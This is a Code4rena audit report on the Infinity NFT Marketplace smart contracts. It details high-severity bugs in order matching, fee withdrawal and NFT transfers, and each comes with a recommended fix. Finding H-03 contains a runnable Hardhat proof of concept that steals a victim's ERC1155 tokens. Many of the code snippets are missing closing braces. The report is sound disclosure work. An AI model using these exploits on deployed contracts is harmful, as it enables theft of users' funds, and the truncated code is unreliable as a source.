Infinity NFT Marketplace contest
Findings & Analysis Report


Table of contents


About C4

Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.

A C4 audit contest is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.

During the audit contest outlined in this document, C4 conducted an analysis of the Infinity NFT Marketplace smart contract system written in Solidity. The audit contest took place between June 14—June 19 2022.


113 Wardens contributed reports to the Infinity NFT Marketplace contest:

  1. PwnedNoMore (izhuer, ItsNio and papr1ka2)
  2. unforgiven
  3. shenwilly
  4. kenzo
  5. 0xDjango
  6. 0xsanson
  7. WatchPug (jtp and ming)
  8. 0xalpharush
  9. csanuragjain
  10. KIntern (minhquanym and TrungOre)
  11. GimelSec (rayn and sces60107)
  12. GreyArt (hickuphh3 and itsmeSTYJ)
  13. zzzitron
  14. hyh
  15. k
  16. joestakey
  17. antonttc
  18. 0x29A (0x4non and rotcivegaf)
  19. IllIllI
  20. Ruhum
  21. throttle
  22. 0xf15ers (remora and twojoy)
  23. VAD37
  24. cccz
  25. dipp
  26. wagmi
  27. berndartmueller
  28. peritoflores
  29. auditor0517
  30. p4st13r4 (0x69e8 and 0xb4bb4)
  31. BowTiedWardens (BowTiedHeron, BowTiedPickle, m4rio_eth, Dravee and BowTiedFirefox)
  32. obtarian
  33. 0x1f8b
  34. reassor
  35. oyc_109
  36. Lambda
  37. codexploder
  38. horsefacts
  39. robee
  40. defsec
  41. Kenshin
  42. byterocket (pseudorandom and pmerkleplant)
  43. StErMi
  44. 0xkowloon
  45. Wayne
  46. rfa
  47. MiloTruck
  48. MadWookie
  49. 0xNazgul
  50. simon135
  51. FSchmoede
  52. hansfriese
  53. PPrieditis
  54. _Adam
  55. Picodes
  56. TerrierLover
  57. hake
  58. Chom
  59. Kaiziron
  60. ElKu
  61. Funen
  62. sach1r0
  63. kenta
  64. TomJ
  65. delfin454000
  66. fatherOfBlocks
  67. apostle0x01
  68. asutorufos
  69. zer0dot
  70. 0xNineDec
  71. saian
  72. rajatbeladiya
  73. cryptphi
  74. Treasure-Seeker
  75. samruna
  76. sorrynotsorry
  77. Czar102
  78. sseefried
  79. georgypetrov
  80. cloudjunky
  81. 0x52
  82. 8olidity
  83. Cityscape
  84. 0xmint
  85. nxrblsrpr
  86. Sm4rty
  87. abhinavmir
  88. a12jmx
  89. 0xKitsune
  90. 0xkatana
  91. Tomio
  92. Tadashi
  93. c3phas
  94. Waze
  95. slywaters
  96. 0xAsm0d3us
  97. 0v3rf10w
  98. m9800
  99. obront

This contest was judged by HardlyDifficult.

Final report assembled by itsmetechjay.


The C4 analysis yielded an aggregated total of 20 unique vulnerabilities. Of these vulnerabilities, 11 received a risk rating in the category of HIGH severity and 9 received a risk rating in the category of MEDIUM severity.

Additionally, C4 analysis included 78 reports detailing issues with a risk rating of LOW severity or non-critical. There were also 56 reports recommending gas optimizations.

All of the issues presented here are linked back to their original finding.


The code under review can be found within the C4 Infinity NFT Marketplace contest repository, and is composed of 4 smart contracts written in the Solidity programming language and includes 1,955 lines of Solidity code.

Severity Criteria

C4 assesses the severity of disclosed vulnerabilities according to a methodology based on OWASP standards.

Vulnerabilities are divided into three primary risk categories: high, medium, and low/non-critical.

High-level considerations for vulnerabilities span the following key areas when conducting assessments:

  • Malicious Input Handling
  • Escalation of privileges
  • Arithmetic
  • Gas use

Further information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website.

High Risk Findings (11)

[H-01] Maker buy order with no specified NFT tokenIds may get fulfilled in matchOneToManyOrders without receiving any NFT

Submitted by WatchPug, also found by 0xsanson, PwnedNoMore, and unforgiven

The call stack: matchOneToManyOrders() -> _matchOneMakerSellToManyMakerBuys() -> _execMatchOneMakerSellToManyMakerBuys() -> _execMatchOneToManyOrders() -> _transferMultipleNFTs()

Based on the context, a maker buy order can set OrderItem.tokens as an empty array to indicate that they can accept any tokenId in this collection, in that case, InfinityOrderBookComplication.doTokenIdsIntersect() will always return true.

However, when the system matching a sell order with many buy orders, the InfinityOrderBookComplication contract only ensures that the specified tokenIds intersect with the sell order, and the total count of specified tokenIds equals the sell order’s quantity (makerOrder.constraints[0]).

This allows any maker buy order with same collection and empty tokenIds to be added to manyMakerOrders as long as there is another maker buy order with specified tokenIds that matched the sell order’s tokenIds.

function canExecMatchOneToMany(
    OrderTypes.MakerOrder calldata makerOrder,
    OrderTypes.MakerOrder[] calldata manyMakerOrders
  ) external view override returns (bool) {
    uint256 numItems;
    bool isOrdersTimeValid = true;
    bool itemsIntersect = true;
    uint256 ordersLength = manyMakerOrders.length;
    for (uint256 i = 0; i < ordersLength; ) {
      if (!isOrdersTimeValid || !itemsIntersect) {
        return false; // short circuit

      uint256 nftsLength = manyMakerOrders[i].nfts.length;
      for (uint256 j = 0; j < nftsLength; ) {
        numItems += manyMakerOrders[i].nfts[j].tokens.length;
        unchecked {

      isOrdersTimeValid =
        isOrdersTimeValid &&
        manyMakerOrders[i].constraints[3] <= block.timestamp &&
        manyMakerOrders[i].constraints[4] >= block.timestamp;

      itemsIntersect = itemsIntersect && doItemsIntersect(makerOrder.nfts, manyMakerOrders[i].nfts);

      unchecked {

    bool _isTimeValid = isOrdersTimeValid &&
      makerOrder.constraints[3] <= block.timestamp &&
      makerOrder.constraints[4] >= block.timestamp;

    uint256 currentMakerOrderPrice = _getCurrentPrice(makerOrder);
    uint256 sumCurrentOrderPrices = _sumCurrentPrices(manyMakerOrders);

    bool _isPriceValid = false;
    if (makerOrder.isSellOrder) {
      _isPriceValid = sumCurrentOrderPrices >= currentMakerOrderPrice;
    } else {
      _isPriceValid = sumCurrentOrderPrices <= currentMakerOrderPrice;

    return (numItems == makerOrder.constraints[0]) && _isTimeValid && itemsIntersect && _isPriceValid;

However, because buy.nfts is used as OrderItem to transfer the nfts from seller to buyer, and there are no tokenIds specified in the matched maker buy order, the buyer wont receive any nft (_transferERC721s does nothing, 0 transfers) despite the buyer paid full in price.

function _execMatchOneMakerSellToManyMakerBuys(
    bytes32 sellOrderHash,
    bytes32 buyOrderHash,
    OrderTypes.MakerOrder calldata sell,
    OrderTypes.MakerOrder calldata buy,
    uint256 startGasPerOrder,
    uint256 execPrice,
    uint16 protocolFeeBps,
    uint32 wethTransferGasUnits,
    address weth
  ) internal {
    isUserOrderNonceExecutedOrCancelled[buy.signer][buy.constraints[5]] = true;
    uint256 protocolFee = (protocolFeeBps * execPrice) / 10000;
    uint256 remainingAmount = execPrice - protocolFee;
    _execMatchOneToManyOrders(sell.signer, buy.signer, buy.nfts, buy.execParams[1], remainingAmount);

function _transferERC721s(
    address from,
    address to,
    OrderTypes.OrderItem calldata item
  ) internal {
    uint256 numTokens = item.tokens.length;
    for (uint256 i = 0; i < numTokens; ) {
      IERC721(item.collection).safeTransferFrom(from, to, item.tokens[i].tokenId);
      unchecked {

Proof of Concept

  1. Alice signed and submitted a maker buy order #1, to buy 2 Punk with 2 WETH and specified tokenIds = 1,2
  2. Bob signed and submitted a maker buy order #2, to buy 1 Punk with 1 WETH and with no specified tokenIds.
  3. Charlie signed and submitted a maker sell order #3, ask for 3 WETH for 2 Punk and specified tokenIds = 1,2
  4. The match executor called matchOneToManyOrders() match Charlie’s sell order #3 with buy order #1 and #2, Alice received 2 Punk, Charlie received 3 WETH, Bob paid 1 WETH and get nothing in return.


Change to:

function canExecMatchOneToMany(
    OrderTypes.MakerOrder calldata makerOrder,
    OrderTypes.MakerOrder[] calldata manyMakerOrders
  ) external view override returns (bool) {
    uint256 numItems;
    uint256 numConstructedItems;
    bool isOrdersTimeValid = true;
    bool itemsIntersect = true;
    uint256 ordersLength = manyMakerOrders.length;
    for (uint256 i = 0; i < ordersLength; ) {
      if (!isOrdersTimeValid || !itemsIntersect) {
        return false; // short circuit

      numConstructedItems += manyMakerOrders[i].constraints[0];

      uint256 nftsLength = manyMakerOrders[i].nfts.length;
      for (uint256 j = 0; j < nftsLength; ) {
        numItems += manyMakerOrders[i].nfts[j].tokens.length;
        unchecked {

      isOrdersTimeValid =
        isOrdersTimeValid &&
        manyMakerOrders[i].constraints[3] <= block.timestamp &&
        manyMakerOrders[i].constraints[4] >= block.timestamp;

      itemsIntersect = itemsIntersect && doItemsIntersect(makerOrder.nfts, manyMakerOrders[i].nfts);

      unchecked {

    bool _isTimeValid = isOrdersTimeValid &&
      makerOrder.constraints[3] <= block.timestamp &&
      makerOrder.constraints[4] >= block.timestamp;

    uint256 currentMakerOrderPrice = _getCurrentPrice(makerOrder);
    uint256 sumCurrentOrderPrices = _sumCurrentPrices(manyMakerOrders);

    bool _isPriceValid = false;
    if (makerOrder.isSellOrder) {
      _isPriceValid = sumCurrentOrderPrices >= currentMakerOrderPrice;
    } else {
      _isPriceValid = sumCurrentOrderPrices <= currentMakerOrderPrice;

    return (numItems == makerOrder.constraints[0]) && (numConstructedItems == numItems) && _isTimeValid && itemsIntersect && _isPriceValid;

nneverlander (Infinity) confirmed and resolved:

Fixed in

HardlyDifficult (judge) commented:

Confirmed the scenario as described.

Buyers specifying just a collection and no specific tokens is a basically a floor sweep which has become common for NFTs. In this scenario, the warden shows how a buyer can end up spending money and get nothing in return. This is a High risk issue.

Issue #314 is very similar but flips the impact to explore how a seller’s offer could be attacked and how it applies to an allow list of tokenIds. (It has been grouped with H-01)

[H-02] Loss of funds in matchOneToManyOrders() and takeOrders() and matchOrders() because code don’t check that different ids in one collection are different, so it’s possible to sell one id multiple time instead of selling multiple id one time in one collection of order (lack of checks in doTokenIdsIntersect() especially for ERC1155 tokens)

Submitted by unforgiven


Function matchOneToManyOrders() and takeOrders() and matchOrders() suppose to match sell order to buy order and should perform some checks to ensure that user specified parameters in orders which are signed are not violated when order matching happens. but There is no check in their execution flow to check that an order has different NFT token ids in each one of it’s collections, so even so number of tokens could be valid in order to order transfer but the number of real transferred tokens and their IDs can be different than what user specified and signed. and user funds would be lost. (because of ERC1155 there can be more than one token for a tokenId, so it would be possible to transfer it)

Proof of Concept

This is _takeOrders() and and code:

   * @notice Internal helper function to take orders
   * @dev verifies whether order can be executed
   * @param makerOrder the maker order
   * @param takerItems nfts to be transferred
   * @param execPrice execution price
  function _takeOrders(
    OrderTypes.MakerOrder calldata makerOrder,
    OrderTypes.OrderItem[] calldata takerItems,
    uint256 execPrice
  ) internal {
    bytes32 makerOrderHash = _hash(makerOrder);
    bool makerOrderValid = isOrderValid(makerOrder, makerOrderHash);
    bool executionValid = IComplication(makerOrder.execParams[0]).canExecTakeOrder(makerOrder, takerItems);
    require(makerOrderValid && executionValid, 'order not verified');
    _execTakeOrders(makerOrderHash, makerOrder, takerItems, makerOrder.isSellOrder, execPrice);

As you can see it uses canExecTakeOrder() to check that it is valid to perform matching. This is canExecTakeOrder() and areTakerNumItemsValid() and doTokenIdsIntersect() code which are used in execution flow to check orders and matching validity:

   * @notice Checks whether take orders with a higher order intent can be executed
   * @dev This function is called by the main exchange to check whether take orders with a higher order intent can be executed.
          It checks whether orders have the right constraints - i.e they have the right number of items, whether time is still valid
          and whether the nfts intersect
   * @param makerOrder the maker order
   * @param takerItems the taker items specified by the taker
   * @return returns whether order can be executed
  function canExecTakeOrder(OrderTypes.MakerOrder calldata makerOrder, OrderTypes.OrderItem[] calldata takerItems)
    returns (bool)
    return (makerOrder.constraints[3] <= block.timestamp &&
      makerOrder.constraints[4] >= block.timestamp &&
      areTakerNumItemsValid(makerOrder, takerItems) &&
      doItemsIntersect(makerOrder.nfts, takerItems));

  /// @dev sanity check to make sure that a taker is specifying the right number of items
  function areTakerNumItemsValid(OrderTypes.MakerOrder calldata makerOrder, OrderTypes.OrderItem[] calldata takerItems)
    returns (bool)
    uint256 numTakerItems = 0;
    uint256 nftsLength = takerItems.length;
    for (uint256 i = 0; i < nftsLength; ) {
      unchecked {
        numTakerItems += takerItems[i].tokens.length;
    return makerOrder.constraints[0] == numTakerItems;

   * @notice Checks whether tokenIds intersect
   * @dev This function checks whether there are intersecting tokenIds between two order items
   * @param item1 first item
   * @param item2 second item
   * @return returns whether tokenIds intersect
  function doTokenIdsIntersect(OrderTypes.OrderItem calldata item1, OrderTypes.OrderItem calldata item2)
    returns (bool)
    uint256 item1TokensLength = item1.tokens.length;
    uint256 item2TokensLength = item2.tokens.length;
    // case where maker/taker didn't specify any tokenIds for this collection
    if (item1TokensLength == 0 || item2TokensLength == 0) {
      return true;
    uint256 numTokenIdsPerCollMatched = 0;
    for (uint256 k = 0; k < item2TokensLength; ) {
      for (uint256 l = 0; l < item1TokensLength; ) {
        if (
          item1.tokens[l].tokenId == item2.tokens[k].tokenId && item1.tokens[l].numTokens == item2.tokens[k].numTokens
        ) {
          // increment numTokenIdsPerCollMatched
          unchecked {
          // short circuit
        unchecked {
      unchecked {

    return numTokenIdsPerCollMatched == item2TokensLength;

As you can see there is no logic to check that token IDs in one collection of order are different and code only checks that total number of tokens in one order matches the number of tokens specified and the ids in one order exists in other list defined. function doTokenIdsIntersect() checks to see that tokens ids in one collection can match list of specified tokens. because of this check lacking there are some scenarios that can cause fund lose for ERC1155 tokens (normal ERC721 requires more strange conditions). here is first example:

  1. For simplicity, let’s assume collection and timestamp are valid and match for orders and token is ERC1155
  2. user1 has signed this order: A:(user1 BUY 3 NFT IDs[(1,1),(2,1),(3,1)] at 15 ETH) (buy 1 token of each id=1,2,3)
  3. NFT ID[1] fair price is 1 ETH, NFT ID[2] fair price is 2 ETH, NFT ID[3] fair price is 12 ETH
  4. attacker who has 3 of NFT ID[1] create this list: B:(NFT IDs[(1,1), (1,1), (1,1)] ) (list to trade 1token of id=1 for 3 times)
  5. Attacker call takeOrders() with this parameters: makerOrder: A , takerNfts: B
  6. Contract logic would check all the conditions and validate and verify orders and their matching (they intersect and total number of token to sell is equal to total number of tokens to buy and all of the B list is inside A list) and perform the transaction.
  7. attacker would receive 15 ETH for his 3 token of NFT ID[1] and steal user1 funds. user1 would receive 3 of NFT ID[1] and pays 15 ETH and even so his order A has been executed he doesn’t receive NFT IDs[(2,1),(3,1)] and contract would violates his signed parameters.

This examples shows that in verifying one to many order code should verify that one order’s one collection’s token ids are not duplicates. (the function doTokenIdsIntersect() doesn’t check for this).

This scenario is performable to matchOneToManyOrders() and matchOrders() and but exists in their code (related check logics) too. more important things about this scenario is that it doesn’t require off-chain maching engine to make mistake or malicious act, anyone can call takeOrders() if NFT tokens are ERC1155. for other NFT tokens to perform this attack it requires that seller==buyer or some other strange cases (like auto selling when receiving in one contract).

Tools Used


Add checks to ensure order’s one collection’s token ids are not duplicate in doTokenIdsIntersect()

nneverlander (Infinity) confirmed and resolved:

Agree with assessment. Fixed. and removed support for ERC1155

HardlyDifficult (judge) commented:

This is an interesting scenario where the same NFT appears multiple times in a match and results in one order being under filled, leading to potential losses for the user. And the attack does not depend on the matching engine. Agree this is High risk.

[H-03] canExecTakeOrder mismatches makerOrder and takerItems when duplicated items present

Submitted by PwnedNoMore, also found by 0xsanson, hyh, k, throttle, and zzzitron


When any user provides a sellOrder and they are trying to sell multiple tokens from n (n > 1) different ERC1155 collections in a single order, hakcers can get the tokens of most expensive collections (with n times of the original amount) by paying the same price.

In short, hackers can violate the user-defined orders.

Root Cause

The logic of canExecTakeOrder and canExecMatchOneToMany is not correct.

Let’s take canExecTakeOrder(OrderTypes.MakerOrder calldata makerOrder, OrderTypes.OrderItem[] calldata takerItems) as an example, while canExecMatchOneToMany shares the same error.

Specifically, it first checks whether the number of selling item in makerOrder matches with the ones in takerItems. Note that the number is an aggregated one. Then, it check whether all the items in takerItems are within the scope defined by makerOrder.

The problem comes when there are duplicated items in takerItems. The aggregated number would be correct and all taker’s Items are indeed in the order. However, it does not means takerItems exactly matches all items in makerOrder, which means violation of the order.

For example, if the order requires

          collection: mock1155Contract1.address,
          tokens: [{ tokenId: 0, numTokens: 1 }]
          collection: mock1155Contract2.address,
          tokens: [{ tokenId: 0, numTokens: 1 }]

and the taker provides

          collection: mock1155Contract1.address,
          tokens: [{ tokenId: 0, numTokens: 1 }]
          collection: mock1155Contract1.address,
          tokens: [{ tokenId: 0, numTokens: 1 }]

The taker can grabs two mock1155Contract1 tokens by paying the order which tries to sell a mock1155Contract1 token and a mock1155Contract2 token. When mock1155Contract1 is much more expensive, the victim user will suffer from a huge loss.

As for the approving issue, the users may grant the contract unlimited access, or they may have another order which sells mock1155Contract1 tokens. The attack is easy to perform.

Proof of Concept

First put the MockERC1155.sol under the contracts/ directory:

// SPDX-License-Identifier: MIT
pragma solidity 0.8.14;
import {ERC1155URIStorage} from '@openzeppelin/contracts/token/ERC1155/extensions/ERC1155URIStorage.sol';
import {ERC1155} from '@openzeppelin/contracts/token/ERC1155/ERC1155.sol';
import {Ownable} from '@openzeppelin/contracts/access/Ownable.sol';

contract MockERC1155 is ERC1155URIStorage, Ownable {
  uint256 numMints;

  constructor(string memory uri) ERC1155(uri) {}

  function mint(address to, uint256 id, uint256 amount, bytes memory data) external onlyOwner {
    super._mint(to, id, amount, data);

And then put poc.js under the test/ directory.

const { expect } = require('chai');
const { ethers, network } = require('hardhat');
const { deployContract, NULL_ADDRESS, nowSeconds } = require('../tasks/utils');
const {
} = require('../helpers/orders');

async function prepare1155OBOrder(user, chainId, signer, order, infinityExchange) {
  // grant approvals
  const approvals = await grantApprovals(user, order, signer, infinityExchange.address);
  if (!approvals) {
    return undefined;

  // sign order
  const signedOBOrder = await signOBOrder(chainId, infinityExchange.address, order, signer);

  const isSigValid = await infinityExchange.verifyOrderSig(signedOBOrder);
  if (!isSigValid) {
    console.error('Signature is invalid');
    return undefined;
  return signedOBOrder;

describe('PoC', function () {
  let signers,

  const sellOrders = [];

  let orderNonce = 0;

  const UNIT = toBN(1e18);
  const INITIAL_SUPPLY = toBN(1_000_000).mul(UNIT);

  const totalNFTSupply = 100;
  const numNFTsToTransfer = 50;
  const numNFTsLeft = totalNFTSupply - numNFTsToTransfer;

  function toBN(val) {
    return ethers.BigNumber.from(val.toString());

  before(async () => {
    // signers
    signers = await ethers.getSigners();
    dev = signers[0];
    matchExecutor = signers[1];
    victim = signers[2];
    hacker = signers[3];
    // token
    token = await deployContract('MockERC20', await ethers.getContractFactory('MockERC20'), signers[0]);

    // NFT constracts (ERC1155)
    mock1155Contract1 = await deployContract('MockERC1155', await ethers.getContractFactory('MockERC1155'), dev, [
    mock1155Contract2 = await deployContract('MockERC1155', await ethers.getContractFactory('MockERC1155'), dev, [

    // Exchange
    infinityExchange = await deployContract(
      await ethers.getContractFactory('InfinityExchange'),
      [token.address, matchExecutor.address]

    // OB complication
    obComplication = await deployContract(
      await ethers.getContractFactory('InfinityOrderBookComplication'),

    // add currencies to registry
    await infinityExchange.addCurrency(token.address);
    await infinityExchange.addCurrency(NULL_ADDRESS);

    // add complications to registry
    await infinityExchange.addComplication(obComplication.address);

    // send assets
    await token.transfer(victim.address, INITIAL_SUPPLY.div(4).toString());
    await token.transfer(hacker.address, INITIAL_SUPPLY.div(4).toString());
    for (let i = 0; i < numNFTsToTransfer; i++) {
      await, i, 50, '0x');
      await, i, 50, '0x');

  describe('StealERC1155ByDuplicateItems', () => {
    it('Passed test denotes successful hack', async function () {
      // prepare order
      const user = {
        address: victim.address
      const chainId = network.config.chainId ?? 31337;
      const nfts = [
          collection: mock1155Contract1.address,
          tokens: [{ tokenId: 0, numTokens: 1 }]
          collection: mock1155Contract2.address,
          tokens: [{ tokenId: 0, numTokens: 1 }]
      const execParams = { complicationAddress: obComplication.address, currencyAddress: token.address };
      const extraParams = {};
      const nonce = ++orderNonce;
      const orderId = ethers.utils.solidityKeccak256(['address', 'uint256', 'uint256'], [user.address, nonce, chainId]);
      let numItems = 0;
      for (const nft of nfts) {
        numItems += nft.tokens.length;
      const order = {
        id: orderId,
        isSellOrder: true,
        signerAddress: user.address,
        startPrice: ethers.utils.parseEther('1'),
        endPrice: ethers.utils.parseEther('1'),
        startTime: nowSeconds(),
        endTime: nowSeconds().add(10 * 60),
      const sellOrder = await prepare1155OBOrder(user, chainId, victim, order, infinityExchange);

      // form matching nfts
      const nfts_ = [
          collection: mock1155Contract1.address,
          tokens: [{ tokenId: 0, numTokens: 1 }]
          collection: mock1155Contract1.address,
          tokens: [{ tokenId: 0, numTokens: 1 }]

      // approve currency
      let salePrice = getCurrentSignedOrderPrice(sellOrder);
      await approveERC20(hacker.address, token.address, salePrice, hacker, infinityExchange.address);

      // perform exchange
      await infinityExchange.connect(hacker).takeOrders([sellOrder], [nfts_]);

      // owners after sale
      // XXX: note that the user's intention is to send mock1155Contract1 x 1 + mock1155Contract2 x 1
      // When mock1155Contract1 is much more expensive than mock1155Contract2, user suffers from huge loss
      expect(await mock1155Contract1.balanceOf(hacker.address, 0)).to.equal(2);

And run

$ npx hardhat test --grep PoC

      ✓ Passed test denotes successful hack

Note that the passed test denotes a successful hack.

I would suggest a more gas-consuming approach by hashing all the items and putting them into a list. Then checking whether the lists match.

nneverlander (Infinity) confirmed and resolved:

Fixed in

HardlyDifficult (judge) commented:

This is a High risk issue. The PoC demonstrates how a maker specifying a bundle of NFTs could incorrectly have one ERC1155 item in that bundle processed several times by the taker - the bundle is not fully accepted as expected, the item processed multiple times is essentially overfilled, and this may be abused to the taker’s advantage when the NFTs are not valued the same.

[H-04] Accumulated ETH fees of InfinityExchange cannot be retrieved

Submitted by hyh, also found by 0x29A, 0xf15ers, 0xkowloon, 0xNineDec, berndartmueller, byterocket, cccz, codexploder, GreyArt, horsefacts, IllIllI, Kenshin, kenzo, KIntern, Lambda, obront, obtarian, oyc109, peritoflores, rajatbeladiya, rfa, saian, unforgiven, WatchPug, Wayne, and zer0dot_

ETH fees accumulated from takeOrders() and takeMultipleOneOrders() operations are permanently frozen within the contract as there is only one way designed to retrieve them, a rescueETH() function, and it will work as intended, not being able to access ETH balance of the contract.

Setting the severity as high as the case is a violation of system’s core logic and a permanent freeze of ETH revenue of the project.

Proof of Concept

Fees are accrued in user-facing takeOrders() and takeMultipleOneOrders() via the following call sequences:

takeOrders -> _takeOrders -> _execTakeOrders -> _transferNFTsAndFees -> _transferFees
takeMultipleOneOrders -> _execTakeOneOrder -> _transferNFTsAndFees -> _transferFees

While token fees are transferred right away, ETH fees are kept with the InfinityExchange contract:

   * @notice Transfer fees. Fees are always transferred from buyer to the seller and the exchange although seller is 
            the one that actually 'pays' the fees
   * @dev if the currency ETH, no additional transfer is needed to pay exchange fees since the contract is 'payable'
   * @param seller the seller
   * @param buyer the buyer
   * @param amount amount to transfer
   * @param currency currency of the transfer
  function _transferFees(
    address seller,
    address buyer,
    uint256 amount,
    address currency
  ) internal {
    // protocol fee
    uint256 protocolFee = (PROTOCOL_FEE_BPS * amount) / 10000;
    uint256 remainingAmount = amount - protocolFee;
    // ETH
    if (currency == address(0)) {
      // transfer amount to seller
      (bool sent, ) ={value: remainingAmount}('');
      require(sent, 'failed to send ether to seller');

i.e. when currency is ETH the fee part of the amount, protocolFee, is left with the InfinityExchange contract.

The only way to retrieve ETH from the contract is rescueETH() function:

  /// @dev used for rescuing exchange fees paid to the contract in ETH
  function rescueETH(address destination) external payable onlyOwner {
    (bool sent, ) ={value: msg.value}('');
    require(sent, 'failed');

However, it cannot reach ETH on the contract balance as msg.value is used as the amount to be sent over. I.e. only ETH attached to the rescueETH() call is transferred from owner to destination. ETH funds that InfinityExchange contract holds remain inaccessible.

Consider adding contract balance to the funds transferred:

  /// @dev used for rescuing exchange fees paid to the contract in ETH
  function rescueETH(address destination) external payable onlyOwner {
-   (bool sent, ) ={value: msg.value}('');
+   (bool sent, ) ={value: address(this).balance}('');
    require(sent, 'failed');

nneverlander (Infinity) confirmed

HardlyDifficult (judge) commented:

When an order is filled using ETH, the exchange collects fees by holding them in the contract for later withdraw. However the only withdraw mechanism does not work so that ETH becomes trapped forever.

This is a High risk issue since some ETH is lost with each ETH based trade.

[H-05] Missing Complication check in takeMultipleOneOrders

Submitted by shenwilly

An order’s type and it’s rules are defined in it’s Complication. Not checking it would allow anyone to take any orders regardless of their Complication’s rule, causing unexpected execution for order makers.

takeMultipleOneOrders assumes that all makerOrders are simple orderbook orders and the Complication check is missing here.

Proof of Concept

  • Alice signs a makerOrder with PrivateSaleComplication, allowing only Bob to take the private sale order.
  • A malicious trader calls takeMultipleOneOrders to take Alice’s order, despite the Complication only allowing Bob to take it.

Add canExecTakeOneOrder function in IComplication.sol and implement it in InfinityOrderBookComplication (and future Complications) to support takeMultipleOneOrders operation, then modify takeMultipleOneOrders to use the check:

function takeMultipleOneOrders() {
    for (uint256 i = 0; i < numMakerOrders; ) {
        bytes32 makerOrderHash = _hash(makerOrders[i]);
        bool makerOrderValid = isOrderValid(makerOrders[i], makerOrderHash);
        bool executionValid = IComplication(makerOrders[i].execParams[0]).canExecTakeOneOrder(makerOrders[i]);
        require(makerOrderValid && executionValid, 'order not verified');
        require(currency == makerOrders[i].execParams[1], 'cannot mix currencies');
        require(isMakerSeller == makerOrders[i].isSellOrder, 'cannot mix order sides');
        uint256 execPrice = _getCurrentPrice(makerOrders[i]);
        totalPrice += execPrice; // @audit-issue missing complication check
        _execTakeOneOrder(makerOrderHash, makerOrders[i], isMakerSeller, execPrice);
        unchecked {

nneverlander (Infinity) confirmed and resolved:

fixed in

HardlyDifficult (judge) commented:

takeMultipleOneOrders does not check restrictions set via the Complication. Agree with the High risk assessment here.

[H-06] Some real-world NFT tokens may support both ERC721 and ERC1155 standards, which may break InfinityExchange::_transferNFTs

Submitted by PwnedNoMore

Many real-world NFT tokens may support both ERC721 and ERC1155 standards, which may break InfinityExchange::_transferNFTs, i.e., transferring less tokens than expected.

For example, the asset token of The Sandbox Game, a Top20 ERC1155 token on Etherscan, supports both ERC1155 and ERC721 interfaces. Specifically, any ERC721 token transfer is regarded as an ERC1155 token transfer with only one item transferred (token address and implementation).

Assuming there is a user tries to buy two tokens of Sandbox’s ASSETs with the same token id, the actual transferring is carried by InfinityExchange::_transferNFTs which first checks ERC721 interface supports and then ERC1155.

  function _transferNFTs(
    address from,
    address to,
    OrderTypes.OrderItem calldata item
  ) internal {
    if (IERC165(item.collection).supportsInterface(0x80ac58cd)) {
      _transferERC721s(from, to, item);
    } else if (IERC165(item.collection).supportsInterface(0xd9b67a26)) {
      _transferERC1155s(from, to, item);

The code will go into _transferERC721s instead of _transferERC1155s, since the Sandbox’s ASSETs also support ERC721 interface. Then,

  function _transferERC721s(
    address from,
    address to,
    OrderTypes.OrderItem calldata item
  ) internal {
    uint256 numTokens = item.tokens.length;
    for (uint256 i = 0; i < numTokens; ) {
      IERC721(item.collection).safeTransferFrom(from, to, item.tokens[i].tokenId);
      unchecked {

Since the ERC721(item.collection).safeTransferFrom is treated as an ERC1155 transferring with one item (reference), there is only one item actually gets traferred.

That means, the user, who barely know the implementation details of his NFTs, will pay the money for two items but just got one.

Note that the situation of combining ERC721 and ERC1155 is prevalent and poses a great vulnerability of the exchange contract.

Proof of Concept

Check the return values of Sandbox’s ASSETs’s supportInterface, both supportInterface(0x80ac58cd) and supportInterface(0xd9b67a26) return true.

Reorder the checks,e.g.,

  function _transferNFTs(
    address from,
    address to,
    OrderTypes.OrderItem calldata item
  ) internal {
    if (IERC165(item.collection).supportsInterface(0xd9b67a26)) {
      _transferERC1155s(from, to, item);
    } else if (IERC165(item.collection).supportsInterface(0x80ac58cd)) {
      _transferERC721s(from, to, item);

nneverlander (Infinity) confirmed and resolved:

Fixed in

HardlyDifficult commented:

When an NFT supports both 721 & 1155 interfaces, the code prefers _transferERC721s - however this ignores the order’s numTokens. This may result in under filling NFTs for an order, at the same cost to the buyer. The warden’s recommendation would address this concern. Or maybe _transferERC721s could require numTokens == 1, but that approach would be limiting for this scenario. Since the buyer gets a fraction of what they paid for and it impacts a top20 1155, this seems to be a High risk issue.

[H-07] _transferNFTs() succeeds even if no transfer is performed

Submitted by k, also found by 0x29A, 0xf15ers, 0xsanson, antonttc, hyh, PwnedNoMore, and zzzitron

If an NFT is sold that does not specify support for the ERC-721 or ERC-1155 standard interface, the sale will still succeed. In doing so, the seller will receive funds from the buyer, but the buyer will not receive any NFT from the seller. This could happen in the following cases:

  1. A token that claims to be ERC-721/1155 compliant, but fails to implement the supportsInterface() function properly.
  2. An NFT that follows a standard other than ERC-721/1155 and does not implement their EIP-165 interfaces.
  3. A malicious contract that is deployed to take advantage of this behavior.

Proof of Concept

If neither the ERC-721 nor the ERC-1155 interface is supported the function should revert. An alternative approach would be to attempt a transferFrom and check the balance before and after to ensure that it succeeded.

nneverlander (Infinity) confirmed and resolved:

Fixed in

HardlyDifficult (judge) commented:

If supportsInterface returns false for both 721 & 1155 then no NFT is transferred but funds are still sent to the seller.

A number of NFTs do not fully comply with the 721/1155 standards. Since the order is not canceled or the tx reverted, this seems like a High risk issue.

[H-08] Overpayment of native ETH is not refunded to buyer

Submitted by horsefacts, also found by 0x29A, antonttc, berndartmueller, byterocket, cccz, codexploder, dipp, GimelSec, GreyArt, Lambda, oyc109, Ruhum, and unforgiven_

Vulnerability Details

InfinityExchange accepts payments in native ETH, but does not return overpayments to the buyer. Overpayments are likely in the case of auction orders priced in native ETH.

In the case of a Dutch or reverse Dutch auction priced in native ETH, the end user is likely to send more ETH than the final calculated price in order to ensure their transaction succeeds, since price is a function of block.timestamp, and the user cannot predict the timestamp at which their transaction will be included.

In a Dutch auction, final price may decrease below the calculated price at the time the transaction is sent. In a reverse Dutch auction, the price may increase above the calculated price by the time a transaction is included, so the buyer is incentivized to provide additional ETH in case the price rises while their transaction is waiting for inclusion.

The takeOrders and takeMultipleOneOrders functions both check that the buyer has provided an ETH amount greater than or equal to the total price at the time of execution:


    // check to ensure that for ETH orders, enough ETH is sent
    // for non ETH orders, IERC20 safeTransferFrom will throw error if insufficient amount is sent
